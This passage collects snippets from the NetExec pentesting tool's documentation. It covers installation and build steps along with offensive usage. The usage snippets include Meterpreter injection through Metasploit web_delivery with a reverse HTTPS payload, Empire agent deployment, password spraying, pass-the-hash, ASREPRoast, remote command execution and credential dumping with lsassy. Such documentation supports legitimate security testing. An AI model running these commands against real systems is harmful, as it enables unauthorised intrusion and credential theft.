### Setting up NetExec Tab Completion with argcomplete Source: https://www.netexec.wiki/getting-started/installation/setting-up-tab-completion This snippet demonstrates the installation of `python3-argcomplete` and the registration of tab completion for the `nxc` command in user's Bash or Zsh shell configuration files. This enables automatic command and argument completion for NetExec. ```Shell sudo apt install python3-argcomplete # For Bash register-python-argcomplete nxc >> ~/.bashrc # For Zsh register-python-argcomplete nxc >> ~/.zshrc ``` -------------------------------- ### Verifying NetExec Command Availability Source: https://www.netexec.wiki/getting-started/installation/setting-up-tab-completion These commands are used to quickly verify that the NetExec executable (`nxc`) is correctly installed and accessible in the system's PATH after completing the installation and configuration steps. ```Shell NetExec netexec nxc ``` -------------------------------- ### Install NetExec on Windows via pipx from GitHub Source: https://www.netexec.wiki/getting-started/installation/installation-on-windows This snippet provides commands to install `pipx` and then use it to install NetExec directly from its GitHub repository. This method requires Git, Rust, and C++ build tools to be pre-installed on the system. ```shell pip install pipx python -m pipx ensurepath python -m pipx install git+https://github.com/Pennyw0rth/NetExec ``` -------------------------------- ### Install UV for NetExec Development Source: https://www.netexec.wiki/getting-started/installation/installation-on-unix This set of commands prepares your system for NetExec development using 'uv'. It installs Rust (a prerequisite), 'pipx', 'git', and then 'uv' itself. 'uv' is a fast Python package installer and resolver. ```bash curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh apt install pipx git pipx ensurepath pipx install uv ``` -------------------------------- ### Set Up NetExec Development Environment with Poetry Source: https://www.netexec.wiki/getting-started/installation/installation-on-unix After installing 'poetry', these commands clone the NetExec source code from GitHub, navigate into the project directory, install all project dependencies using 'poetry install', and then run NetExec in the development environment using 'poetry run NetExec'. ```bash git clone https://github.com/Pennyw0rth/NetExec cd NetExec poetry install poetry run NetExec ``` -------------------------------- ### Configure Empire RESTful API Source: https://www.netexec.wiki/smb-protocol/command-execution/getting-shells-101 This command starts the Empire RESTful API server, making it accessible for external tools like NetExec. It specifies the user credentials for API authentication and displays the generated API token. ```CLI python powershell-empire --rest --user empireadmin --pass Password123! [*] Loading modules from: /home/mpgn/Tools/Empire/lib/modules/ * Starting Empire RESTful API on port: 1337 * RESTful API token: l5l051eqiqe70c75dis68qjheg7b19di7n8auzml * Running on https://0.0.0.0:1337/ (Press CTRL+C to quit) ``` -------------------------------- ### Set Up NetExec Development Environment with UV Source: https://www.netexec.wiki/getting-started/installation/installation-on-unix After installing 'uv', these commands clone the NetExec source code from GitHub, navigate into the project directory, install all project dependencies using 'uv tool install .', and finally run NetExec in the development environment using 'uv run netexec'. ```bash git clone https://github.com/Pennyw0rth/NetExec cd NetExec uv tool install . uv run netexec ``` -------------------------------- ### Install NetExec on BlackArch Linux Source: https://www.netexec.wiki/getting-started/installation/installation-on-unix This command synchronizes the package databases and then installs the NetExec package from the BlackArch repositories using 'pacman'. This is the standard installation method for BlackArch users. ```bash pacman -Syu netexec ``` -------------------------------- ### Install NetExec System-Wide with pipx Source: https://www.netexec.wiki/getting-started/installation/installation-on-unix This sequence of commands installs 'pipx' and 'git' using 'apt', ensures 'pipx' is added to your system's PATH, and then installs NetExec directly from its GitHub repository using 'pipx'. This method is recommended for system-wide usage of NetExec and 'nxcdb'. ```bash sudo apt install pipx git pipx ensurepath pipx install git+https://github.com/Pennyw0rth/NetExec ``` -------------------------------- ### Build NetExec Binary on Linux Source: https://www.netexec.wiki/getting-started/installation/manually-building-the-binary Sets up a Python virtual environment, activates it, removes any existing apt-installed PyInstaller, installs PyInstaller and project dependencies via pip, and then compiles the NetExec binary using its spec file. ```Bash virtualenv env source env/bin/activate sudo apt remove python3-pyinstaller pip install pyinstaller . pyinstaller netexec.spec ``` -------------------------------- ### Install NetExec on macOS using pipx Source: https://www.netexec.wiki/getting-started/installation/installation-for-mac Details the process of installing NetExec on macOS. It first installs `pipx` using Homebrew, a tool that helps install and run Python applications in isolated environments, and then uses `pipx` to install NetExec directly from its GitHub repository. ```Shell brew install pipx ``` ```Shell pipx install git+https://github.com/Pennyw0rth/NetExec ``` -------------------------------- ### Install Poetry for NetExec Development Source: https://www.netexec.wiki/getting-started/installation/installation-on-unix This sequence of commands sets up 'poetry' for NetExec development. It installs Rust, 'pipx', 'git', then 'poetry' itself via 'pipx' (recommended), and finally adds and enables the 'poetry-dynamic-versioning' plugin, which is crucial for NetExec's dependency management. ```bash curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh apt install pipx git pipx ensurepath pipx install poetry poetry self add "poetry-dynamic-versioning[plugin]" poetry dynamic-versioning enable ``` -------------------------------- ### Install Rust for NetExec Dependencies Source: https://www.netexec.wiki/getting-started/installation/installation-on-unix This command downloads and executes the Rust installer script. Rust is a prerequisite for building some of NetExec's dependencies, such as 'aardwolf' and 'arc4', which might fail to build without it. Ensure your shell is reloaded after installation to update the PATH. ```bash curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh ``` -------------------------------- ### Run NetExec using Python ZippApp Source: https://www.netexec.wiki/getting-started/installation/installation-on-windows This command shows how to execute NetExec when distributed as a Python ZippApp. This method requires a standalone Python installation and ensuring the `python.exe` path is correctly configured in the system's PATH environment variable. ```shell python.exe .\nxc ``` -------------------------------- ### Execute NetExec after pipx installation Source: https://www.netexec.wiki/getting-started/installation/installation-on-windows After successfully installing NetExec using pipx, this command demonstrates how to launch the NetExec application from the command line. A restart of the command line might be required for the changes to take effect. ```shell NetExec ``` -------------------------------- ### Execute Meterpreter via NetExec Source: https://www.netexec.wiki/smb-protocol/command-execution/getting-shells-101 This NetExec command utilizes the `met_inject` module to inject a Meterpreter payload. It targets a specified IP range, authenticates, and provides the necessary parameters (SRVHOST, SRVPORT, RAND, SSL) for the Meterpreter web delivery setup. ```CLI nxc 192.168.10.0/24 -u username -p password -M met_inject -o SRVHOST=192.168.10.3 SRVPORT=8443 RAND=eYEssEwv2D SSL=http ``` -------------------------------- ### Authenticate with NetExec using username and password Source: https://www.netexec.wiki/getting-started/using-credentials Demonstrates the basic command-line syntax for authenticating with NetExec using a username and password. Includes examples for handling special characters in credentials and credentials starting with a dash by using single quotes or the long argument format. ```Shell nxc -u username -p password ``` ```Shell nxc -u username -p 'October2022!' ``` ```Shell nxc -u='-username' -p='-October2022' ``` -------------------------------- ### Build NetExec Binary on Windows Source: https://www.netexec.wiki/getting-started/installation/manually-building-the-binary Sets up a Python virtual environment, activates it, installs necessary Python packages including PyInstaller and Pillow, and then compiles the NetExec binary using the provided spec file. Rust is a prerequisite for this process on Windows. ```Bash python -m venv env source env/Scripts/activate pip install pyinstaller pillow . pyinstaller netexec.spec ``` -------------------------------- ### Install Rust on macOS Source: https://www.netexec.wiki/getting-started/installation/installation-for-mac Provides two common methods for installing the Rust programming language on macOS. Rust is a fundamental dependency for NetExec. The first method uses Homebrew for a quick installation, while the second uses the official `rustup` script for more control over Rust toolchains. ```Shell brew install rust ``` ```Shell curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh source "$HOME/.cargo/env" ``` -------------------------------- ### Update or Reinstall NetExec via pipx Source: https://www.netexec.wiki/getting-started/installation/installation-on-unix These commands provide options for maintaining your NetExec installation when using 'pipx'. 'pipx upgrade netexec' updates NetExec to the latest available version, while 'pipx reinstall netexec' forces a fresh download and installation from the GitHub repository, useful for resolving issues or getting the very latest commits. ```bash pipx upgrade netexec # Will update if there is a new version pipx reinstall netexec # Force download the latest commits from github ``` -------------------------------- ### Configure Empire Listener Source: https://www.netexec.wiki/smb-protocol/command-execution/getting-shells-101 These commands demonstrate how to set up a new listener within the Empire console. A listener is essential for receiving connections from agents deployed on target systems. ```CLI (Empire: listeners) > set Name test (Empire: listeners) > set Host 192.168.10.3 (Empire: listeners) > set Port 9090 (Empire: listeners) > set CertPath data/empire.pem (Empire: listeners) > run (Empire: listeners) > list [*] Active listeners: ID Name Host Type Delay/Jitter KillDate Redirect Target -- ---- ---- ------- ------------ -------- --------------- 1 test http://192.168.10.3:9090 native 5/0.0 (Empire: listeners) > ``` -------------------------------- ### Install NetExec on Kali Linux Source: https://www.netexec.wiki/getting-started/installation/installation-on-unix This command sequence updates the package lists and then installs the NetExec package directly from the Kali Linux repositories using 'apt'. This is the simplest method for Kali users. ```bash apt update apt install netexec ``` -------------------------------- ### NetExec SMB Certificate Authentication Examples Source: https://www.netexec.wiki/getting-started/using-certificates This section provides various examples for authenticating with NetExec's SMB module using different certificate formats, including PFX and PEM. NetExec generates a ccache file inside its home directory after successful certificate-based authentication, which can then be used for Kerberos authentication with other tools. ```CLI nxc smb 192.168.0.1 --pfx-cert user.pfx -u user ``` ```CLI nxc smb 192.168.0.1 --pfx-cert user.pfx --pfx-pass password -u user ``` ```CLI nxc smb 192.168.0.1 --pfx-base64 user.pfx -u user ``` ```CLI nxc smb 192.168.0.1 --pem-cert user.pem --pem-key key.pem -u user ``` -------------------------------- ### Metasploit web_delivery Exploit Configuration Source: https://www.netexec.wiki/smb-protocol/command-execution/getting-shells-101 This section details the commands and parameters required to set up and run the `exploit/multi/script/web_delivery` module in Metasploit. This module hosts a script (e.g., PowerShell) that, when executed on a target, establishes a Meterpreter session. ```APIDOC use exploit/multi/script/web_delivery - Selects the web_delivery exploit module for script delivery. set SRVHOST - Sets the local IP address for the web server that will host the payload script. - Parameter: IP_ADDRESS (string) - The IP address of the Metasploit host. set SRVPORT - Sets the local port for the web server. - Parameter: PORT (integer) - The port number (e.g., 8443). set target 2 - Specifies the type of script to be delivered. - Value '2' indicates a PowerShell target. set payload windows/meterpreter/reverse_https - Defines the Meterpreter payload to be used. - This payload establishes a reverse HTTPS connection for Windows systems. set LHOST - Sets the local IP address for the reverse Meterpreter listener. - Parameter: IP_ADDRESS (string) - The IP address of the Metasploit host. set LPORT - Sets the local port for the reverse Meterpreter listener. - Parameter: PORT (integer) - The port number (e.g., 443). run -j - Executes the exploit in the background, starting both the web server and the listener. - Returns: Output indicating server started and the URL for the payload script. - Example Output: [*] Exploit running as background job. [*] Started HTTPS reverse handler on https://10.211.55.4:8443/ [*] Using URL: http://10.211.55.4:8080/eYEssEwv2D [*] Local IP: http://10.211.55.4:8080/eYEssEwv2D [*] Server started. ``` -------------------------------- ### Install NetExec on Parrot Security OS Source: https://www.netexec.wiki/getting-started/installation/installation-on-unix This command sequence updates the package lists and then installs the NetExec package directly from the Parrot Security OS repositories using 'apt'. This is the recommended method for ParrotSec users. ```bash apt update apt install netexec ``` -------------------------------- ### NetExec SMB schtask_as Full Example Source: https://www.netexec.wiki/smb-protocol/impersonate-logged-on-users A comprehensive example demonstrating the use of NetExec's `schtask_as` module. It executes a `whoami` command as a specified target user, setting a custom scheduled task name, output file, and output location, using local authentication. ```NetExec nxc smb [] -u [] -p [] --local-auth -M schtask_as -o USER=[target] CMD="whoami" TASK="Windows Update Service" FILE="update.log" LOCATION="\\Windows\\Tasks\\" ``` -------------------------------- ### Run NetExec and nxcdb After pipx Installation Source: https://www.netexec.wiki/getting-started/installation/installation-on-unix After successfully installing NetExec with 'pipx', open a new shell or terminal session. These commands allow you to execute the main NetExec application and its companion database tool, 'nxcdb', from anywhere in your system. ```bash NetExec nxcdb ``` -------------------------------- ### NetExec NFS: Download and Upload Files with Share Source: https://www.netexec.wiki/nfs-protocol/download-and-upload-files Demonstrates how to download and upload files using `nxc nfs` with the `--share` option. This example shows transferring `as.txt` and `aa.txt` to and from a specified NFS share, along with the expected command-line output for successful operations. ```Shell # Share name is "/home/user/Desktop/NFSShare" nxc nfs --share /home/user/Desktop/NFSShare/ --get-file as.txt as.txt # Example Output NFS [*] Supported NFS versions: (3, 4) (root escape:True) NFS [*] Downloading as.txt to as.txt NFS File successfully downloaded from as.txt to as.txt nxc nfs --share /home/user/Desktop/NFSShare/ --put-file aa.txt aa.txt # Example Output NFS [*] Supported NFS versions: (3, 4) (root escape:True) NFS [*] Uploading from aa.txt to aa.txt NFS [*] Trying to create aa.txtaa.txt NFS [+] aa.txt successfully created NFS [+] Data from aa.txt successfully written to aa.txt with permissions 777 NFS File aa.txt successfully uploaded to aa.txt ``` -------------------------------- ### SSH Protocol Core Actions Source: https://www.netexec.wiki/smb-protocol/enumeration/enumerate-disks Essential SSH operations including password spraying, authentication, command execution, and file transfer (get and put files). ```APIDOC Password Spraying Authentication Command Execution Get and Put Files ``` -------------------------------- ### Perform Basic RDP Password Spraying with NetExec Source: https://www.netexec.wiki/rdp-protocol Demonstrates basic RDP password spraying against a subnet or a single host using NetExec. The first command shows the general syntax, while the second provides a concrete example with output, illustrating both failed and successful login attempts. ```bash nxc rdp 192.168.1.0/24 -u user -p password ``` ```bash nxc rdp 192.168.133.157 -u ron -p October2021 RDP 192.168.133.157 3389 DC01 [*] Windows 10 or Windows Server 2016 Build 17763 (name:DC01) (domain:poudlard.wizard) RDP 192.168.133.157 3389 DC01 [-] poudlard.wizard\ron:October2021 $ nxc rdp 192.168.133.157 -u rubeus -p October2021 RDP 192.168.133.157 3389 DC01 [*] Windows 10 or Windows Server 2016 Build 17763 (name:DC01) (domain:poudlard.wizard) RDP 192.168.133.157 3389 DC01 [+] poudlard.wizard\rubeus:October2021 (Pwn3d!) ``` -------------------------------- ### NetExec SMB Authentication with User and Hash Source: https://www.netexec.wiki/smb-protocol/authentication/checking-credentials-domain These commands show various ways to authenticate against SMB shares using NetExec (nxc) when credentials are in hash format. Examples include using LM:NT hashes, NT hash only, or the full hash string, useful for pass-the-hash attacks. ```Shell nxc smb 192.168.1.0/24 -u UserNAme -H 'LM:NT' ``` ```Shell nxc smb 192.168.1.0/24 -u UserNAme -H 'NTHASH' ``` ```Shell nxc smb 192.168.1.0/24 -u Administrator -H '13b29964cc2480b4ef454c59562e675c' ``` ```Shell nxc smb 192.168.1.0/24 -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c' ``` -------------------------------- ### NetExec: Authenticate SMB with Kerberos using ticket cache Source: https://www.netexec.wiki/getting-started/using-kerberos Illustrates authenticating to an SMB share using an existing Kerberos ticket cache (`.ccache` file). The `KRB5CCNAME` environment variable points to the cache, and `--use-kcache` enables its use. Examples include authenticating with different user caches and executing a remote command (`whoami`). ```bash $ export KRB5CCNAME=/home/bonclay/impacket/administrator.ccache $ nxc smb zoro.gold.local --use-kcache SMB zoro.gold.local 445 ZORO [*] Windows 10.0 Build 14393 (name:ZORO) (domain:gold.local) (signing:False) (SMBv1:False) SMB zoro.gold.local 445 ZORO [+] gold.local\administrator (Pwn3d!) $ nxc smb zoro.gold.local --use-kcache -x whoami SMB zoro.gold.local 445 ZORO [*] Windows 10.0 Build 14393 (name:ZORO) (domain:gold.local) (signing:False) (SMBv1:False) SMB zoro.gold.local 445 ZORO [+] gold.local\administrator (Pwn3d!) SMB zoro.gold.local 445 ZORO [+] Executed command SMB zoro.gold.local 445 ZORO gold\administrator $ export KRB5CCNAME=/home/bonclay/impacket/bonclay.ccache $ nxc smb zoro.gold.local --use-kcache -x whoami SMB zoro.gold.local 445 ZORO [*] Windows 10.0 Build 14393 (name:ZORO) (domain:gold.local) (signing:False) (SMBv1:False) SMB zoro.gold.local 445 ZORO [+] gold.local\bonclay ``` -------------------------------- ### Install NetExec on Kali Linux Source: https://www.netexec.wiki/news/v1.2 This command sequence updates the package list for your Kali Linux system and then installs the latest version of NetExec using the apt package manager. This simplifies the deployment and management of NetExec on Kali distributions. ```Bash sudo apt update && sudo apt install netexec ``` -------------------------------- ### Perform Local SMB Authentication Checks with NetExec Source: https://www.netexec.wiki/smb-protocol/authentication/checking-credentials-local This snippet demonstrates how to use the `nxc smb` command-line tool to attempt local authentication against SMB services. It shows examples for providing a username and password, an empty username/password, and various hash formats (LM:NT, NTHASH, or raw NT hash) using the `--local-auth` flag. ```Shell nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-auth nxc smb 192.168.1.0/24 -u '' -p '' --local-auth nxc smb 192.168.1.0/24 -u UserNAme -H 'LM:NT' --local-auth nxc smb 192.168.1.0/24 -u UserNAme -H 'NTHASH' --local-auth nxc smb 192.168.1.0/24 -u localguy -H '13b29964cc2480b4ef454c59562e675c' --local-auth nxc smb 192.168.1.0/24 -u localguy -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c' --local-auth ``` -------------------------------- ### Execute Standard Shell Commands on Windows with nxc Source: https://www.netexec.wiki/smb-protocol/command-execution/execute-remote-command This example demonstrates how to execute a standard shell command, such as 'whoami', on a target Windows system using NetExec (nxc) over the SMB protocol. It requires administrator credentials and utilizes the `-x` flag for direct command execution. ```Shell nxc smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami ``` -------------------------------- ### Authenticate to MSSQL using Windows Authentication Source: https://www.netexec.wiki/mssql-protocol/authentication Demonstrates how to authenticate to an MSSQL server using Windows authentication. Includes examples for when the SMB port is open (direct credentials) and when it's closed (requiring the domain to be specified with -d). ```Shell nxc mssql 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!' ``` ```Shell nxc mssql 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!' -d HTB ``` -------------------------------- ### NetExec SMB Local Authentication Success Output Example Source: https://www.netexec.wiki/smb-protocol/authentication/checking-credentials-local This snippet illustrates the typical output format displayed by `nxc smb` when a local authentication attempt is successful. It shows the service type, target IP, port, hostname, and the authenticated username/password combination, often indicating a 'Pwn3d!' status. ```Shell SMB 192.168.1.101 445 HOSTNAME [+] HOSTNAME\Username:Password (Pwn3d!) ``` -------------------------------- ### Applying Jitter for Authentication Throttling with nxc Source: https://www.netexec.wiki/getting-started/using-credentials Demonstrates how to use the `--jitter` option with the `nxc` command-line tool to introduce delays between authentication requests. Examples show setting a fixed jitter, a range for random jitter, and a specific fixed jitter by setting the range's upper and lower bounds to the same value. ```bash nxc --jitter 3 -u ~/file_containing_usernames -p ~/file_containing_passwords nxc --jitter 2-5 -u ~/file_containing_usernames -p ~/file_containing_passwords nxc --jitter 4-4 -u ~/file_containing_usernames -p ~/file_containing_passwords ``` -------------------------------- ### Execute Multiple NetExec Modules Simultaneously Source: https://www.netexec.wiki/getting-started/using-modules NetExec supports running multiple modules in a single command execution. This example shows how to chain multiple '-M' flags, each followed by a module name, to run several modules against the specified targets concurrently. ```Shell nxc -u Administrator -p 'P@ssw0rd' -M spooler -M iis -M lsassy -M winscp ``` -------------------------------- ### Configure NetExec for Empire and Metasploit API Authentication Source: https://www.netexec.wiki/smb-protocol/command-execution/getting-shells-101 This configuration block from `~/.nxc/nxc.conf` specifies the API host, port, username, and password for NetExec to authenticate with Empire's RESTful API and Metasploit's RPC API. Proper configuration is crucial for NetExec to interact with these frameworks. ```INI [Empire] api_host=127.0.0.1 api_port=1337 username=empireadmin password=Password123! [Metasploit] rpc_host=127.0.0.1 rpc_port=55552 password=abc123 ``` -------------------------------- ### Execute Empire Agent via NetExec Source: https://www.netexec.wiki/smb-protocol/command-execution/getting-shells-101 This NetExec command uses the `empire_exec` module to deploy an Empire agent. It targets a specific IP range, authenticates with provided credentials, and specifies the name of the Empire listener to use for the agent. ```CLI nxc 192.168.10.0/24 -u username -p password -M empire_exec -o LISTENER=test ``` -------------------------------- ### NetExec Command-Line Help and Protocol Options Source: https://www.netexec.wiki/getting-started/selecting-and-using-a-protocol This snippet provides the full help output for the NetExec (nxc) command, detailing general usage, global options like threading and timeout, and a comprehensive list of all supported protocols. It implicitly demonstrates how to view specific protocol options by running `nxc --help` and how to use them with `nxc `. ```Shell #~ nxc --help usage: nxc [-h] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL] [--no-progress] [--verbose] [--debug] [--version] {smb,ssh,ldap,ftp,wmi,winrm,rdp,vnc,mssql} ... <-- Banner --> options: -h, --help show this help message and exit -t THREADS set how many concurrent threads to use (default: 100) --timeout TIMEOUT max timeout in seconds of each thread (default: None) --jitter INTERVAL sets a random delay between each connection (default: None) --no-progress Not displaying progress bar during scan --verbose enable verbose output --debug enable debug level information --version Display nxc version protocols: available protocols {smb,ssh,ldap,ftp,wmi,winrm,rdp,vnc,mssql,nfs} smb own stuff using SMB ssh own stuff using SSH ldap own stuff using LDAP ftp own stuff using FTP wmi own stuff using WMI winrm own stuff using WINRM rdp own stuff using RDP vnc own stuff using VNC mssql own stuff using MSSQL nfs own stuff using NFS ``` -------------------------------- ### NetExec MSSQL Password Spraying Output Example Source: https://www.netexec.wiki/mssql-protocol/mssql-passwordspray This output snippet illustrates the typical results from a NetExec MSSQL password spraying operation. It shows how the tool reports both failed login attempts (e.g., 'Login failed for user') and successful credential findings (e.g., 'sa:password (Pwn3d!)'). ```CLI Output MSSQL 10.10.10.59 1433 None [-] ERROR(TALLY): Line 1: Login failed for user 'test1'. MSSQL 10.10.10.59 1433 None [+] sa:password (Pwn3d!) ``` -------------------------------- ### Perform Authenticated FTP Directory Listing using NetExec Source: https://www.netexec.wiki/ftp-protocol/file-listing-etc This example demonstrates how to use the `nxc ftp` command-line tool to perform a directory listing on an FTP server. It requires a target IP address, valid username, and password. The `--ls` option is used to initiate the directory listing after successful authentication, displaying the server's banner, authentication status, and the contents of the current directory. ```shell nxc ftp 192.168.0.10 -u 'marshall' -p 'badpassword' --ls FTP 192.168.0.10 21 192.168.0.10 [*] Banner: (vsFTPd 3.0.5) FTP 192.168.0.10 21 192.168.0.10 [+] marshall:badpassword FTP 192.168.0.10 21 192.168.0.10 [*] Directory Listing FTP 192.168.0.10 21 192.168.0.10 drwxr-xr-x 2 1000 1000 4096 Sep 30 17:29 Desktop FTP 192.168.0.10 21 192.168.0.10 drwxr-xr-x 2 1000 1000 4096 Aug 28 2022 Documents FTP 192.168.0.10 21 192.168.0.10 drwxr-xr-x 2 1000 1000 4096 Jul 13 23:42 Downloads FTP 192.168.0.10 21 192.168.0.10 drwxr-xr-x 2 1000 1000 4096 Aug 28 2022 Music FTP 192.168.0.10 21 192.168.0.10 drwxr-xr-x 2 1000 1000 4096 Aug 28 2022 Pictures FTP 192.168.0.10 21 192.168.0.10 drwxr-xr-x 2 1000 1000 4096 Aug 28 2022 Public FTP 192.168.0.10 21 192.168.0.10 drwxr-xr-x 2 1000 1000 4096 Aug 28 2022 Templates FTP 192.168.0.10 21 192.168.0.10 drwxr-xr-x 2 1000 1000 4096 Aug 28 2022 Videos FTP 192.168.0.10 21 192.168.0.10 drwx------ 4 1000 1000 4096 Aug 28 2022 snap ``` -------------------------------- ### Upload a File using NetExec FTP Source: https://www.netexec.wiki/ftp-protocol/get-and-put-files This command uploads a local file to an FTP server using NetExec's FTP module, provided the user has relevant permissions. It requires the target IP address, username, password, the local file path, and the desired remote file path. The example demonstrates a permission denied error. ```bash nxc ftp [IP_ADDRESS] -u [USERNAME] -p [PASSWORD] --put [LOCAL_FILE] [REMOTE_FILE] ``` ```bash nxc ftp 10.10.176.246 -u frank -p D2xc9CgD --put test.txt test.txt FTP 10.10.176.246 21 10.10.176.246 [*] Banner: (vsFTPd 3.0.3) FTP 10.10.176.246 21 10.10.176.246 [+] frank:D2xc9CgD FTP 10.10.176.246 21 10.10.176.246 [-] Failed to upload file. Response: (550 Permission denied.) ``` -------------------------------- ### Clone NetExec Repository on Windows Source: https://www.netexec.wiki/getting-started/installation/manually-building-the-binary Clones the NetExec Git repository from GitHub and navigates into the project directory. This is the first step to acquire the source code for building the binary on a Windows system. ```Bash git clone https://github.com/Pennyw0rth/NetExec.git cd NetExec ``` -------------------------------- ### Listing Available Commands in nxcdb Source: https://www.netexec.wiki/getting-started/database-general-usage Shows how to use the `help` command within the `nxcdb` shell to display a list of documented and undocumented commands. This provides an overview of the functionalities available for database interaction. ```shell nxcdb (default)(smb) > help Documented commands (type help ): ======================================== clear_database creds dpapi exit export groups help hosts shares wcc Undocumented commands: ====================== back import ``` -------------------------------- ### Switching Between Protocol Databases in nxcdb Source: https://www.netexec.wiki/getting-started/database-general-usage Demonstrates how to navigate back from a specific protocol's database (e.g., SMB) to the main workspace prompt using `back`, and then switch to another protocol's database (e.g., HTTP). This shows flexible navigation between data contexts. ```shell nxcdb (test)(smb) > back nxcdb (test) > proto http nxcdb (test)(http) > ``` -------------------------------- ### Accessing the nxcdb Command Shell Source: https://www.netexec.wiki/getting-started/database-general-usage Demonstrates how to launch the `nxcdb` command-line interface, which provides an abstraction layer for interacting with the `nxc` backend database. This is the initial prompt seen upon execution. ```shell #~ nxcdb nxcdb (default) > ``` -------------------------------- ### Clone NetExec Repository on Linux Source: https://www.netexec.wiki/getting-started/installation/manually-building-the-binary Clones the NetExec Git repository from GitHub and changes the current directory to the newly cloned project. This is the initial step to obtain the source code for building the binary on a Linux system. ```Bash git clone https://github.com/Pennyw0rth/NetExec.git cd NetExec ``` -------------------------------- ### Run Compiled NetExec Binary on Linux Source: https://www.netexec.wiki/getting-started/installation/manually-building-the-binary Executes the newly compiled NetExec binary located in the 'dist' directory. This command is used to verify successful compilation and run the application. ```Bash ./dist/nxc ``` -------------------------------- ### Execute NetExec LDAP module to get user descriptions Source: https://www.netexec.wiki/ldap-protocol/get-user-descriptions This command executes the NetExec LDAP module `get-desc-users` to retrieve user descriptions from an LDAP server, specifically looking for passwords within them. It requires a hostname, username, and password for authentication. Additional options include `FILTER` to search for a specific string, `PASSWORDPOLICY` to check against Windows complexity requirements, and `MINLENGTH` to specify a minimum password length. ```Shell nxc ldap -u -p -M get-desc-users ``` -------------------------------- ### WMI Protocol: Authentication and Command Execution Source: https://www.netexec.wiki/getting-started/log-your-results Outlines techniques for interacting with WMI, including password spraying, authentication, and command execution. ```APIDOC Password Spraying Authentication Command Execution ``` -------------------------------- ### Display Options for a NetExec Module Source: https://www.netexec.wiki/getting-started/using-modules Before using a module, it's often necessary to understand its configurable options. This command allows users to view all supported options for a specific NetExec module, helping in tailoring its behavior. ```Shell nxc smb -M lsassy --options ``` -------------------------------- ### SSH Protocol: Remote Access and File Transfer Source: https://www.netexec.wiki/news/v1.0 Outlines standard SSH operations such as password spraying, authentication, remote command execution, and secure file transfer (get and put files). ```APIDOC SSH Protocol Operations: - Password Spraying: Attempting common passwords against SSH accounts. - Authentication: Methods for authenticating to SSH servers. - Command Execution: Executing commands remotely via SSH. - Get and Put Files: Transferring files to and from SSH servers. ``` -------------------------------- ### List Available NetExec Modules for a Protocol Source: https://www.netexec.wiki/getting-started/using-modules This command allows users to view all available modules for a specified network protocol within NetExec. It's useful for discovering what functionalities are supported for a given service, such as SMB. ```Shell nxc smb -L ``` -------------------------------- ### Run Compiled NetExec Binary on Windows Source: https://www.netexec.wiki/getting-started/installation/manually-building-the-binary Executes the compiled NetExec binary executable located in the 'dist' directory. This command is used to run and test the application after successful compilation on Windows. ```Bash ./dist/nxc.exe ``` -------------------------------- ### Exporting Shares Data from nxcdb Source: https://www.netexec.wiki/getting-started/database-general-usage Shows an example of exporting detailed shares information from the database to a CSV file using the `export` command within `nxcdb`. This command facilitates data extraction for further analysis or reporting. ```shell nxcdb (test)(smb) > export shares detailed file.csv ``` -------------------------------- ### Authenticate to WMI using Local Auth Source: https://www.netexec.wiki/wmi-protocol/authentication Provides an example of authenticating to a WMI target with `netexec` using local user credentials. The `--local-auth` flag is essential for bypassing domain authentication and targeting local user accounts on the remote system. ```CLI nxc wmi 10.10.10.52 -u admin -p 'admin' --local-auth ``` -------------------------------- ### WINRM Protocol: Authentication and Command Execution Source: https://www.netexec.wiki/getting-started/log-your-results Documents techniques for interacting with the WINRM protocol, including password spraying, authentication, command execution, and LAPS defeat. ```APIDOC Password Spraying Authentication Command Execution Defeating LAPS ``` -------------------------------- ### NetExec MSSQL Password Spray Expected Output Source: https://www.netexec.wiki/mssql-protocol Illustrates the typical console output from a NetExec MSSQL password spraying operation. It shows examples of failed login attempts and highlights successful authentications with the 'Pwn3d!' indicator, demonstrating how NetExec reports compromised credentials. ```Shell MSSQL 10.10.10.59 1433 None [-] ERROR(TALLY): Line 1: Login failed for user 'test1'. MSSQL 10.10.10.59 1433 None [+] sa:password (Pwn3d!) ``` -------------------------------- ### Execute a Specific NetExec Module Source: https://www.netexec.wiki/getting-started/using-modules This command demonstrates how to run a particular NetExec module against one or more targets. It requires specifying the protocol, target(s), and the module name, along with authentication credentials if necessary. ```Shell nxc smb -u Administrator -p 'October2022' -M lsassy ``` -------------------------------- ### Example NetExec LDAP Authentication Success Output Source: https://www.netexec.wiki/ldap-protocol/authentication This snippet illustrates the typical output from a successful NetExec (nxc) LDAP authentication attempt. It shows the protocol, target IP, port, identified domain, and the validated user credentials, confirming a successful login. ```Shell LDAP 192.168.255.131 5985 ROGER [+] GOLD\\user:password ``` -------------------------------- ### Perform ASREPRoast with NetExec Source: https://www.netexec.wiki/ldap-protocol/asreproast This snippet demonstrates how to use NetExec to perform ASREPRoast attacks against LDAP. It includes examples for unauthenticated attacks using a single user or a user list, and authenticated attacks, including handling KDC host resolution issues. ```bash nxc ldap 192.168.0.104 -u harry -p '' --asreproast output.txt ``` ```bash nxc ldap 192.168.0.104 -u user.txt -p '' --asreproast output.txt ``` ```bash nxc ldap 192.168.0.104 -u harry -p pass --asreproast output.txt ``` ```bash nxc ldap 192.168.0.104 -u harry -p pass --asreproast output.txt --kdcHost domain_name ``` -------------------------------- ### Enable long paths for NetExec FileNotFoundError fix Source: https://www.netexec.wiki/getting-started/installation/installation-on-windows This Windows Registry command resolves a common `FileNotFoundError` encountered with NetExec, particularly when dealing with long file paths. It enables long path support in the Windows file system, preventing issues with deeply nested directories. ```shell REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem" /v LongPathsEnabled /t REG_DWORD /d 1 /f ``` -------------------------------- ### Enumerate Domain Users via Null Session with rpcclient Source: https://www.netexec.wiki/smb-protocol/enumeration/enumerate-null-sessions This command block uses rpcclient to connect to an SMB target via a null session and then enumerates domain users. The `enumdomusers` command is executed within the rpcclient interactive 